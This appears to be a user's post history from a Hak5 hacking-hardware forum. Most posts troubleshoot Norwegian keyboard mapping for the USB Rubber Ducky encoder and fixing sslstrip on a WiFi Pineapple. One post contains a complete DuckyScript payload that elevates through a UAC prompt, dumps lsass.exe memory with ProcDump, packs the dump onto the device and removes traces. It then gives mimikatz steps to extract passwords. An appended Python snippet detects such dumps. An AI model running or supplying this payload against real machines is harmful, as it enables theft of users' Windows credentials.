Posts posted by Hackman1970

  1. I SSH'd into the pineapple and ran the following. This will definitely fix the sslstrip; I tested it after doing a factory reset and it worked.

    opkg remove twisted-web --force-depends
    opkg update
    opkg install twisted-web
    ln -s /sd/usr/lib/python2.7/site-packages/sslstrip /usr/lib/python2.7/site-packages/
    ln -s /sd/usr/lib/python2.7/site-packages/OpenSSL/ /usr/lib/python2.7/site-packages/
    sslstrip
    

    This worked for me. I can now start sslstrip from console :) , but it still says not installed in web interface...

  2. Char not found:ASCII_5E in no.properties
    For Norwegian, this did not do the trick either:
    //ASCII_5E = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT + KEY_SPACE
    // 94 ^
    

    neither

    //ASCII_5E = DIAERESIS_BITS, MODIFIERKEY_SHIFT + KEY_SPACE
    // 94 ^
    In the US keymap your key } is in the same place as our ^
    Here is my output:
    root@kali-vb:/media/DUCKY# java -jar encoder.jar -l no.properties -i inject.txt -o inject.bin
    Hak5 Duck Encoder 2.6
    Loading File ..... [ OK ]
    Loading Keyboard File ..... [ OK ]
    Loading Language File ..... [ OK ]
    Loading DuckyScript ..... [ OK ]
    Char not found:ASCII_5E
    Char not found:ASCII_5E
    DuckyScript Complete..... [ OK ]

    To find out if more keys have problems with no.properties I made a script with all Norwegian keys:

    REM *** Testscript for norwegian keyboards ***
    REM *** Author: Hackman1970
    REM *** Editor: LeafPad
    REM *** Character Coding UTF-8
    
    REM *** Wait for detection of RubberDucky
    DELAY 2000
    GUI-R
    STRING notepad
    DELAY 500
    STRING ROW 1 OPEN  : |1234567890+\ 
    ENTER
    STRING ROW 1 SHIFT : §!"#¤%&/()=?`
    ENTER
    STRING ROW 1 ALTGR :   @£$  {[]}±'
    ENTER
    ENTER
    STRING ROW 2 OPEN  : qwertyuiopå"
    ENTER
    STRING ROW 2 SHIFT : QWERTYUIOPÅ^
    ENTER
    STRING ROW 2 ALTGR : ¦ €        ~
    ENTER
    ENTER
    STRING ROW 3 OPEN  : asdfghjkløæ'
    ENTER
    STRING ROW 3 SHIFT : ASDFGHJKLØÆ*
    ENTER
    ENTER
    STRING ROW 4 OPEN  : <zxcvbnm,.-
    ENTER
    STRING ROW 4 SHIFT : >ZXCVBNM;:_
    ENTER
    STRING ROW 4 ALTGR : ½
    ENTER
    

    Here's the encoder's output:

    root@kali-vb:/media/DUCKY# java -jar encoder.jar -l no.properties -i nbno_keys_UTF-8.txt -o inject.bin
    Hak5 Duck Encoder 2.6
    
    Loading File ..... [ OK ]
    Loading Keyboard File ..... [ OK ]
    Loading Language File ..... [ OK ]
    Loading DuckyScript ..... [ OK ]
    Char not found:ASCII_9
    Char not found:ASCII_9
    Char not found:ASCII_60
    Char not found:ASCII_9
    Char not found:ISO_8859_1_B1
    Char not found:ASCII_9
    Char not found:ASCII_9
    Char not found:ASCII_5E
    Char not found:ASCII_9
    Char not found:ISO_8859_1_A6
    Char not found:ASCII_9
    Char not found:ASCII_9
    Char not found:ASCII_9
    Char not found:ASCII_9
    Char not found:ASCII_9
    DuckyScript Complete..... [ OK ]
    
    root@kali-vb:/media/DUCKY# 

    Here is the output:

    ROW 1 OPEN  : |1234567890+\ OK
    ROW 1 SHIFT : §!"#¤%&/()=?  MISSING ` = ( \ + SHIFT + SPACE )
    ROW 1 ALTGR :   @£$  {[]}'  OK
    
    ROW 2 OPEN  : qwertyuiopå"  OK
    ROW 2 SHIFT : QWERTYUIOPÅ   MISSING ^ = ( ¨ + SHIFT + SPACE )
    ROW 2 ALTGR :  €        ~   OK
    
    ROW 3 OPEN  : asdfghjkløæ'  OK
    ROW 3 SHIFT : ASDFGHJKLØÆ*  OK
    
    ROW 4 OPEN  : <zxcvbnm,.-   OK
    ROW 4 SHIFT : >ZXCVBNM;:_   OK
    ROW 2 ALTGR : |             HAS CHANGED KEY
    
  3. Char not found:ASCII_5E in no.properties
    I have tried this in no.properties without any luck:
    //ASCII_5E = CIRCUMFLEX_BITS, MODIFIERKEY_SHIFT + KEY_SPACE
    // 94 ^
    
    On my keyboard this key lives on the upper left side of the ENTER key and it looks like this:
     -------
    |  ^    |
    |     ~ | 
    |  ¨    |
     -------
    

    I have to press SHIFT + ABOVE KEY + SPACE to get the letter ^. Is there someone out there who can give me a hint?

    Char not found:ASCII_5E in no.properties
    For Norwegian, this did not do the trick either:
    //ASCII_5E = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT + KEY_SPACE
    // 94 ^
    

    neither

    //ASCII_5E = DIAERESIS_BITS, MODIFIERKEY_SHIFT + KEY_SPACE
    // 94 ^
    In the US keymap your key } is in the same place as our ^
    Here is my output:
    root@kali-vb:/media/DUCKY# java -jar encoder.jar -l no.properties -i inject.txt -o inject.bin
    Hak5 Duck Encoder 2.6
    Loading File ..... [ OK ]
    Loading Keyboard File ..... [ OK ]
    Loading Language File ..... [ OK ]
    Loading DuckyScript ..... [ OK ]
    Char not found:ASCII_5E
    Char not found:ASCII_5E
    DuckyScript Complete..... [ OK ]
  4. Hello

    I got my RubberDucky some days ago and have tested a bit in Norwegian.

    I ran into problems with ASCII_5E when this key ^ is in the script.

    Else I have not seen anything wrong yet...

    After some testing with no.properties I gave that up for now. This did not work:

    //ASCII_5E = CIRCUMFLEX_BITS, MODIFIERKEY_SHIFT + KEY_SPACE
    // 94 ^ 

    Instead I tried to circumvent the problem, thinking the other way around: change the "victim's" keyboard to US English.

    In this post: https://forums.hak5.org/index.php?/topic/30210-payload-memory-dump-windows-recover-password-without-setting-off-av/

    I have made a comment at the bottom of the page on how to do this until no.properties has been fixed.

  5. I had problems with Norwegian keyboards and this key ^ so I made some changes in the code to make it work in Norwegian.

    First I tried fixing no.properties for //ASCII_5E = CIRCUMFLEX_BITS, MODIFIERKEY_SHIFT + KEY_SPACE, which did not work for me.

    Instead of using no.properties I use US standard and make the computer change from Norwegian to US English.

    I have tested this on my Norwegian Windows 7 x64; it worked perfectly for me :)

    Probably the way to go instead of dk.properties and se.properties too?

    Check out my modified code:

    REM Author: Hak5Darren with the help of:
    REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals, 7zip
    REM
    REM Modified to circumvent norwegian keyboards by Hackman1970
    REM
    REM Description: "Backup" Windows Passwords without setting off AntiVirus
    REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump
    REM Passwords can later be extracted using mimikatz.
    REM
    REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD
    REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp
    REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from:
    REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
    REM
    REM Include 7za.exe on root of DUCKY SD card. Download 7zip command line version from:
    REM http://www.7-zip.org/download.html
    REM
    REM Target: Windows Vista/7/8, Win32/x64
    
    REM *** UAC Bypass ***
    DELAY 2000
    WINDOWS r
    REM *** Input Language Swap to circumvent problems with Norwegian
    REM *** Norwegian Windows 7 usually has US English as second language installed by default
    REM *** Using shortcut ALT-SHIFT to toggle between NO and US
    ALT-SHIFT
    DELAY 200
    STRING powershell Start-Process cmd.exe -Verb runAs
    ENTER
    DELAY 500
    
    REM *** For norwegian I tried to change y[es] to j[a]
    REM ALT y
    REM ALT j 
    REM *** The above did not work but LEFTARROW ENTER works :)
    LEFTARROW
    ENTER
    DELAY 500
    
    REM *** Swap Input Language again for cmd.exe shell
    ALT-SHIFT 
    DELAY 200
    
    REM *** Define DUCKY drive as %duck%
    ENTER
    STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
    ENTER
    DELAY 500
    
    REM *** Execute procdump from SD card, Save dump to %temp%, Compress dump with 7zip from SD card, Send archive to SD card, Delete dump from %temp%, Exit ***
    STRING %duck%\procdump.exe -accepteula -ma lsass.exe %temp%\%COMPUTERNAME%_lsass.dmp & %duck%\7za.exe a -t7z -mx9 "%duck%\%COMPUTERNAME%_lsass.7z" "%temp%\%COMPUTERNAME%_lsass.dmp" & del %temp%\%COMPUTERNAME%_lsass.dmp & exit
    ENTER
    
    REM *** Swap Input Language again hopefully back to Norwegian
    ALT-SHIFT 
    
    
    REM *** Post Exploitation ***
    REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a 
    REM directory including the version of mimikatz for your targets architecture
    REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands
    REM (I had to use the one from \mimikatz\alpha\x64 for my Windows 7 x64 box:)
    REM mimikatz.exe <enter>
    REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter>
    REM sekurlsa::logonPasswords full <enter>
    

    Is this the way to go, or does anyone have a fix for no.properties? :rolleyes:

  6. Char not found:ASCII_5E in no.properties
    I have tried this in no.properties without any luck:
    //ASCII_5E = CIRCUMFLEX_BITS, MODIFIERKEY_SHIFT + KEY_SPACE
    // 94 ^
    
    On my keyboard this key lives on the upper left side of the ENTER key and it looks like this:
     -------
    |  ^    |
    |     ~ | 
    |  ¨    |
     -------
    

    I have to press SHIFT + ABOVE KEY + SPACE to get the letter ^. Is there someone out there who can give me a hint?
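
Seen from the defender's side, the ProcDump and 7-Zip command lines in the payload of post 5 leave recognisable process-creation records. The following is an added example, not part of the original posts: it classifies command lines by their arguments, and the rule names, event layout and sample events (host PC01, drive E:, paths) are constructed assumptions.

```python
import re

# ProcDump dump-type switch (-ma full, -mp MiniPlus, -mm mini) as its own argument.
DUMP_SWITCH = re.compile(r'(?<!\S)[-/](?:ma|mp|mm)(?!\S)', re.I)
# "lsass" or "lsass.exe" as a stand-alone argument, not as part of a file name.
LSASS_ARG = re.compile(r'(?<![^\s"])lsass(?:\.exe)?(?![^\s"])', re.I)
# A file name that contains "lsass" and ends in .dmp (the dump being moved or packed).
LSASS_DUMP_FILE = re.compile(r'[^\s"\\/]*lsass[^\s"\\/]*\.dmp(?![^\s"])', re.I)

def classify(command_line):
    """Return the (hypothetical) rule names that fire for one command line."""
    hits = []
    # Match on arguments, not the image name, so a renamed procdump.exe still fires.
    if DUMP_SWITCH.search(command_line) and LSASS_ARG.search(command_line):
        hits.append("lsass-memory-dump")
    if LSASS_DUMP_FILE.search(command_line):
        hits.append("lsass-dump-file-handled")
    return hits

def scan(events):
    """Map event index -> rule names, for events where at least one rule fires."""
    return {i: h for i, e in enumerate(events) if (h := classify(e["cmd"]))}

# Constructed process-creation events (host PC01, drive E: and paths are made up).
SAMPLE_EVENTS = [
    {"cmd": r'E:\procdump.exe -accepteula -ma lsass.exe C:\Users\u\AppData\Local\Temp\PC01_lsass.dmp'},
    {"cmd": r'E:\7za.exe a -t7z -mx9 "E:\PC01_lsass.7z" "C:\Users\u\AppData\Local\Temp\PC01_lsass.dmp"'},
    {"cmd": r'C:\Temp\pd.exe /MA LSASS.EXE C:\Temp\out.dmp'},          # renamed binary
    {"cmd": r'C:\Tools\procdump.exe -ma w3wp.exe C:\dumps\w3wp.dmp'},  # unrelated dump
]

if __name__ == "__main__":
    for index, rules in scan(SAMPLE_EVENTS).items():
        print(index, rules)
# Limitation: a dump requested by PID has no "lsass" argument; cover that case with
# process-access telemetry on lsass.exe (for example Sysmon Event ID 10).
```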
